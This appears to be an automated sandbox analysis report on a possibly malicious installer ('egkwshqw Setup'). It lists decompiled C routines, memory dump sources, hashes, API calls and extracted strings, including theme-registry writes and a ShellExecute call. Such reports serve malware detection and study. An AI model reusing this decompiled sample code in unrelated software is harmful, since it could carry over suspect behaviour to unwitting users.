                                                  									}
                                                  									_t222 = _v8 - _v24;
                                                  									_t254 = 1 << _t222;
                                                  									if(1 <= _v20) {
                                                  										L40:
                                                  										_t256 =  *_a36;
                                                  										_t168 = 1 << _t222;
                                                  										_v40 = 1;
                                                  										_t274 = _t256 + 1;
                                                  										if(_t274 > 0x5a0) {
                                                  											goto L64;
                                                  										}
                                                  									} else {
                                                  										_t275 = _v32;
                                                  										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                  										if(_t222 >= _t296) {
                                                  											goto L40;
                                                  										}
                                                  										while(1) {
                                                  											_t222 = _t222 + 1;
                                                  											if(_t222 >= _t296) {
                                                  												goto L40;
                                                  											}
                                                  											_t275 = _t275 + 4;
                                                  											_t264 = _t263 + _t263;
                                                  											_t175 =  *_t275;
                                                  											if(_t264 <= _t175) {
                                                  												goto L40;
                                                  											}
                                                  											_t263 = _t264 - _t175;
                                                  										}
                                                  										goto L40;
                                                  									}
                                                  									_t168 = _a32 + _t256 * 4;
                                                  									_t297 = _t299 + _v16 * 4 - 0xec;
                                                  									 *_a36 = _t274;
                                                  									_t259 = _v16;
                                                  									 *_t297 = _t168;
                                                  									if(_t259 == 0) {
                                                  										 *_a24 = _t168;
                                                  									} else {
                                                  										_t276 = _v12;
                                                  										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                  										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                  										_a5 = _a28;
                                                  										_a4 = _t222;
                                                  										_t262 = _t276 >> _t186;
                                                  										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                  										 *(_t298 + _t262 * 4) = _a4;
                                                  									}
                                                  									_t224 = _v24;
                                                  									_t186 = _t224;
                                                  									_t225 = _t224 + _a28;
                                                  									_v24 = _t225;
                                                  								} while (_v8 > _t225);
                                                  								L45:
                                                  								_t284 = _v36;
                                                  								_a5 = _v8 - _t186;
                                                  								if(_t284 < 0x42ceb8 + _a8 * 4) {
                                                  									_t205 =  *_t284;
                                                  									if(_t205 >= _a12) {
                                                  										_t207 = _t205 - _a12 + _t205 - _a12;
                                                  										_v36 =  &(_v36[1]);
                                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                  									} else {
                                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                  										_t208 =  *_t284;
                                                  										_v36 =  &(_t284[1]);
                                                  									}
                                                  									_a6 = _t208;
                                                  								} else {
                                                  									_a4 = 0xc0;
                                                  								}
                                                  								_t286 = 1 << _v8 - _t186;
                                                  								_t244 = _v12 >> _t186;
                                                  								while(_t244 < _v40) {
                                                  									 *(_t168 + _t244 * 4) = _a4;
                                                  									_t244 = _t244 + _t286;
                                                  								}
                                                  								_t287 = _v12;
                                                  								_t246 = 1 << _v44;
                                                  								while((_t287 & _t246) != 0) {
                                                  									_t287 = _t287 ^ _t246;
                                                  									_t246 = _t246 >> 1;
                                                  								}
                                                  								_t288 = _t287 ^ _t246;
                                                  								_v20 = 1;
                                                  								_v12 = _t288;
                                                  								_t251 = _v16;
                                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                  									L60:
                                                  									if(_v48 != 0) {
                                                  										_t282 = _v48;
                                                  										_t283 = _t282 - 1;
                                                  										_t200 = _a28 + _t186;
                                                  										_v48 = _t283;
                                                  										_v24 = _t200;
                                                  										if(_v8 <= _t200) {
                                                  											goto L45;
                                                  										}
                                                  										goto L31;
                                                  									}
                                                  									break;
                                                  								} else {
                                                  									goto L58;
                                                  								}
                                                  								do {
                                                  									L58:
                                                  									_t186 = _t186 - _a28;
                                                  									_t251 = _t251 - 1;
                                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                  								_v16 = _t251;
                                                  								goto L60;
                                                  							}
                                                  							L61:
                                                  							_v8 = _v8 + 1;
                                                  							_v32 = _v32 + 4;
                                                  							_v44 = _v44 + 1;
                                                  						} while (_v8 <= _v28);
                                                  						goto L62;
                                                  					}
                                                  					_t277 = 0;
                                                  					do {
                                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                  						_t277 = _t277 + 4;
                                                  						_t235 = _t235 - 1;
                                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                  					} while (_t235 != 0);
                                                  					goto L21;
                                                  				}
                                                  				 *_a24 =  *_a24 & 0x00000000;
                                                  				 *_a28 =  *_a28 & 0x00000000;
                                                  				return 0;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                  • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                  • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                  • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9a43b7c50e93ea4ecb4cdfa1c7eca4a213ec3ac8ae3714a1824bfe2dbee7ef7
                                                  • Instruction ID: 5fe38d42531f784a224d3fecef2c7a20139bdf02c646c8dce6f358f423566a87
                                                  • Opcode Fuzzy Hash: f9a43b7c50e93ea4ecb4cdfa1c7eca4a213ec3ac8ae3714a1824bfe2dbee7ef7
                                                  • Instruction Fuzzy Hash: 75A1151485D2EDADDF06CBF985517FCBFB05E26102F4845CAE4E5A6283C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7451c3b050b500f785c9848a886a6ef16453fa74494989cfc899055879a50539
                                                  • Instruction ID: 4721f06c7f859f75a57ba82df12e331963c7de30f973e1416f8305908413f415
                                                  • Opcode Fuzzy Hash: 7451c3b050b500f785c9848a886a6ef16453fa74494989cfc899055879a50539
                                                  • Instruction Fuzzy Hash: 78A1051485D2E9ADDF06CBF981507FCBFB05E2A102F4845C6E0E5E6283C13A938EDB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction ID: 10f8ed0a67d1b5b9b1597bdd4d8eca1eb8f457700e83ef57be7d0f61b44693c3
                                                  • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                  • Instruction Fuzzy Hash: 8111C231A10209DFDB10DBAAD8888ADF7FDEF546D6B9540A9F805DB214E771DE80C6A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction ID: a8b10e805ba595d6164c36b397a1c2bd290a90df7eda33313150419afd32a9fd
                                                  • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                  • Instruction Fuzzy Hash: 29E06D35764504DF8744CBA8D842D15B3E8EB08220B144290F815CF3E0E635ED40D650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction ID: a544df41eb135a73c9f595c2bff29c4b6edbb5da40d65bdf48bc3a43505697b2
                                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction Fuzzy Hash: 6BE08636714510CBC360CA19E585D56F3E8EB8C2F271A4469EC49DF751D271FC408A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                  				char* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				struct HWND__* _t52;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t85;
                                                  				long _t86;
                                                  				int _t98;
                                                  				struct HWND__* _t99;
                                                  				signed int _t100;
                                                  				intOrPtr _t107;
                                                  				intOrPtr _t109;
                                                  				int _t110;
                                                  				signed int* _t112;
                                                  				signed int _t113;
                                                  				char* _t114;
                                                  				CHAR* _t115;
                                                  
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 != 0x111) {
                                                  						L11:
                                                  						if(_a8 != 0x4e) {
                                                  							if(_a8 == 0x40b) {
                                                  								 *0x42a080 =  *0x42a080 + 1;
                                                  							}
                                                  							L25:
                                                  							_t110 = _a16;
                                                  							L26:
                                                  							return E00403EEA(_a8, _a12, _t110);
                                                  						}
                                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                                  						_t110 = _a16;
                                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                  							_v12 = _t100;
                                                  							_v16 = _t109;
                                                  							_v8 = 0x42dbc0;
                                                  							if(_t100 - _t109 < 0x800) {
                                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                  								SetCursor(LoadCursorA(0, 0x7f02));
                                                  								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                  								SetCursor(LoadCursorA(0, 0x7f00));
                                                  								_t110 = _a16;
                                                  							}
                                                  						}
                                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                  							goto L26;
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                  								SendMessageA( *0x42ec28, 0x111, 1, 0);
                                                  							}
                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                  								SendMessageA( *0x42ec28, 0x10, 0, 0);
                                                  							}
                                                  							return 1;
                                                  						}
                                                  					}
                                                  					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
                                                  						goto L25;
                                                  					} else {
                                                  						_t112 =  *0x429870 + 0x14;
                                                  						if(( *_t112 & 0x00000020) == 0) {
                                                  							goto L25;
                                                  						}
                                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                  						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                  						E00404256();
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				_t98 = _a16;
                                                  				_t113 =  *(_t98 + 0x30);
                                                  				if(_t113 < 0) {
                                                  					_t107 =  *0x42e3fc; // 0x7a3d7a
                                                  					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                  				}
                                                  				_t71 =  *0x42ec58; // 0x7a2864
                                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                  				_t114 = _t113 + _t71;
                                                  				_push(0x22);
                                                  				_a16 =  *_t114;
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t115 = _t114 + 1;
                                                  				_v16 = _t115;
                                                  				_v8 = E00403F97;
                                                  				E00403E83(_a4);
                                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                  				_push(0x23);
                                                  				E00403E83(_a4);
                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                  				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                  				_t99 = GetDlgItem(_a4, 0x3e8);
                                                  				E00403EB8(_t99);
                                                  				SendMessageA(_t99, 0x45b, 1, 0);
                                                  				_t85 =  *0x42ec30; // 0x79ee58
                                                  				_t86 =  *(_t85 + 0x68);
                                                  				if(_t86 < 0) {
                                                  					_t86 = GetSysColor( ~_t86);
                                                  				}
                                                  				SendMessageA(_t99, 0x443, 0, _t86);
                                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                  				 *0x429064 =  *0x429064 & 0x00000000;
                                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                  				 *0x42a080 =  *0x42a080 & 0x00000000;
                                                  				return 0;
                                                  			}





















                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
                                                  • GetDlgItem.USER32 ref: 0040406A
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                  • GetSysColor.USER32(?), ref: 00404099
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                  • lstrlenA.KERNEL32(?), ref: 004040C1
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                  • GetDlgItem.USER32 ref: 00404141
                                                  • SendMessageA.USER32(00000000), ref: 00404144
                                                  • GetDlgItem.USER32 ref: 0040416F
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                  • LoadCursorA.USER32 ref: 004041BE
                                                  • SetCursor.USER32(00000000), ref: 004041C7
                                                  • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                  • LoadCursorA.USER32 ref: 004041E7
                                                  • SetCursor.USER32(00000000), ref: 004041EA
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: N$Xy$d(z$open$rtrystwqtc$z=z
                                                  • API String ID: 3615053054-1267446240
                                                  • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                  • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                  • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                  • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrcpynW.KERNEL32 ref: 10002B7A
                                                  • lstrcpynW.KERNEL32 ref: 10002BAE
                                                  • lstrcpynW.KERNEL32 ref: 10002BE2
                                                  • RegCreateKeyW.ADVAPI32 ref: 10002C44
                                                  • RegSetValueExW.ADVAPI32 ref: 10002CAA
                                                  • lstrlenW.KERNEL32 ref: 10002CC9
                                                  • RegSetValueExW.ADVAPI32 ref: 10002D0B
                                                  • lstrlenW.KERNEL32 ref: 10002D20
                                                    • Part of subcall function 100015C0: RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001678
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 100016C1
                                                    • Part of subcall function 100015C0: _memset.LIBCMT ref: 10001701
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001731
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 1000177A
                                                    • Part of subcall function 10001850: RegOpenKeyExW.ADVAPI32 ref: 10001896
                                                    • Part of subcall function 10001850: RegOpenKeyExW.ADVAPI32 ref: 100018D7
                                                    • Part of subcall function 10001850: RegQueryValueExA.ADVAPI32 ref: 10001950
                                                    • Part of subcall function 10001850: RegCloseKey.ADVAPI32 ref: 10001A13
                                                  • RegSetValueExW.ADVAPI32 ref: 10002D62
                                                  • lstrlenW.KERNEL32 ref: 10002D77
                                                  • RegSetValueExW.ADVAPI32 ref: 10002DB9
                                                  • RegCloseKey.ADVAPI32 ref: 10002E1E
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001C76
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001CB0
                                                    • Part of subcall function 10001C20: _memset.LIBCMT ref: 10001CF0
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001D20
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001D50
                                                    • Part of subcall function 10001C20: _memset.LIBCMT ref: 10001D88
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001DAE
                                                    • Part of subcall function 10001C20: SystemParametersInfoW.USER32 ref: 10001DDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: InfoParametersSystem$Value$_memsetlstrcpynlstrlen$CloseCreateOpen$Query
                                                  • String ID: ColorName$DllName$Failed to open theme registry key$SizeName$Software\Microsoft\Windows\CurrentVersion\ThemeManager$ThemeActive$Writing theme config to registry
                                                  • API String ID: 3942574804-3345009166
                                                  • Opcode ID: 65653423d6b76968eb8e77c38cbbda078b2032a498a60aa22b66a6c694e172ab
                                                  • Instruction ID: 0d41eca8f7ee2a1d86389d51d41f50bf878ec644b8eeb07a56fe3d75f881ce66
                                                  • Opcode Fuzzy Hash: 65653423d6b76968eb8e77c38cbbda078b2032a498a60aa22b66a6c694e172ab
                                                  • Instruction Fuzzy Hash: ABA1A0B58043149FEB04EF68C98969EBBF0FF44344F40C92EE89997354E7759688CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: QueryValue$InfoParametersSystem$CloseOpen$Colors
                                                  • String ID: %d %d %d$Control Panel\Colors$IconTitleFont$NonClientMetrics$Software\Microsoft\Windows\CurrentVersion\ThemeManager$\
                                                  • API String ID: 4292236304-3791924741
                                                  • Opcode ID: 44bd695f262025842f754ecddfeaa043a753f9a014f6dbb75529d67042742ba0
                                                  • Instruction ID: 3956e4e7eaf4b02e33c6377e1929b27839ec3ebb8081a15dc899d11a3c97f797
                                                  • Opcode Fuzzy Hash: 44bd695f262025842f754ecddfeaa043a753f9a014f6dbb75529d67042742ba0
                                                  • Instruction Fuzzy Hash: E6B1B3B59043199FDB14DF68C98479EBBF4FB88340F0089AEE499A3354D7749A84CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: QueryValue$lstrcpyn$CloseErrorLastOpen
                                                  • String ID: ColorName$DllName$Failed to get ThemeActive: %d$Failed to open theme registry key$Loading theme config$SizeName$Software\Microsoft\Windows\CurrentVersion\ThemeManager$Theme active: %s %s %s$ThemeActive$Theming not active
                                                  • API String ID: 553329553-3690341922
                                                  • Opcode ID: 512619281aa8912ba6cb58a1c67aed12e23ca439f4c3fb6303fbfe7ef993d899
                                                  • Instruction ID: c3f5730b06fc6cc22aebf362673d5ee39f3770c1a533f687f76a1476411486dd
                                                  • Opcode Fuzzy Hash: 512619281aa8912ba6cb58a1c67aed12e23ca439f4c3fb6303fbfe7ef993d899
                                                  • Instruction Fuzzy Hash: CEA190B49097149FE704EF64C5957ADBBF1FB48300F10886EE88997391EB749684CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				struct HDC__* _t70;
                                                  				struct HBRUSH__* _t87;
                                                  				struct HFONT__* _t94;
                                                  				long _t102;
                                                  				intOrPtr _t115;
                                                  				signed int _t126;
                                                  				struct HDC__* _t128;
                                                  				intOrPtr _t130;
                                                  
                                                  				if(_a8 == 0xf) {
                                                  					_t130 =  *0x42ec30; // 0x79ee58
                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                  					_a8 = _t70;
                                                  					GetClientRect(_a4,  &_v32);
                                                  					_t126 = _v32.bottom;
                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                  					while(_v32.top < _t126) {
                                                  						_a12 = _t126 - _v32.top;
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                  						_v32.bottom = _v32.bottom + 4;
                                                  						_a16 = _t87;
                                                  						FillRect(_a8,  &_v32, _t87);
                                                  						DeleteObject(_a16);
                                                  						_v32.top = _v32.top + 4;
                                                  					}
                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                  						_a16 = _t94;
                                                  						if(_t94 != 0) {
                                                  							_t128 = _a8;
                                                  							_v32.left = 0x10;
                                                  							_v32.top = 8;
                                                  							SetBkMode(_t128, 1);
                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                  							_a8 = SelectObject(_t128, _a16);
                                                  							DrawTextA(_t128, "egkwshqw Setup", 0xffffffff,  &_v32, 0x820);
                                                  							SelectObject(_t128, _a8);
                                                  							DeleteObject(_a16);
                                                  						}
                                                  					}
                                                  					EndPaint(_a4,  &_v96);
                                                  					return 0;
                                                  				}
                                                  				_t102 = _a16;
                                                  				if(_a8 == 0x46) {
                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                  					_t115 =  *0x42ec28; // 0x170078
                                                  					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                  				}
                                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                  			}















                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,egkwshqw Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F$Xy$egkwshqw Setup
                                                  • API String ID: 941294808-3058710726
